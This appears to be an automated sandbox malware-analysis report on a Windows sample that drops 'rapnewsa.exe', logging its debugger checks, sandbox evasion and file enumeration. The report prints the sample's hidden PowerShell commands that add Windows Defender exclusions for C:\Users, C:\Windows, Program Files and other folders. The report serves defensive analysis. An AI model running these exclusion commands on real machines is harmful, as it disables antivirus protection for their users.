Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Reka\rapnewsa.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_19-2494
Source: C:\Reka\rapnewsa.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_19-2582
Source: C:\Reka\rapnewsa.exeSystem information queried: FirmwareTableInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6033Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3778Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7485Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1973Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8198Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1310Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8076Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1393Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7397
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2077
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7469
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2115
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8404
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1091
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6572Thread sleep time: -5534023222112862s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1720Thread sleep count: 7485 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3844Thread sleep count: 1973 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3168Thread sleep time: -4611686018427385s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep count: 8198 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5796Thread sleep count: 1310 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5660Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6520Thread sleep count: 8076 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2472Thread sleep count: 1393 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148Thread sleep time: -2767011611056431s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3228Thread sleep count: 7397 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3992Thread sleep count: 2077 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1432Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 928Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2696Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A48D40 FindFirstFileW,FindNextFileW,FindClose,19_2_00A48D40
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A48CA0 GetSystemInfo,19_2_00A48CA0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Reka\rapnewsa.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: rapnewsa.exe, 00000013.00000002.2038436475.000000000118E000.00000004.00000020.00020000.00000000.sdmp, rapnewsa.exe, 00000013.00000002.2038436475.00000000011D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: 1feP5qTCl0.exe, 00000000.00000002.2051703906.000001D8021E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,
Source: C:\Reka\rapnewsa.exeAPI call chain: ExitProcess graph end nodegraph_19-2510
Source: C:\Reka\rapnewsa.exeAPI call chain: ExitProcess graph end nodegraph_19-2504
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Reka\rapnewsa.exeProcess queried: DebugPort
Source: C:\Reka\rapnewsa.exeProcess queried: DebugPort
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A417E0 GlobalHandle,LoadLibraryA,GetProcAddress,19_2_00A417E0
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A41A20 mov eax, dword ptr fs:[00000030h]19_2_00A41A20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"Jump to behavior
Source: C:\Users\user\Desktop\1feP5qTCl0.exeProcess created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exeJump to behavior
Source: C:\Reka\rapnewsa.exeCode function: 19_2_00A48A80 cpuid 19_2_00A48A80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
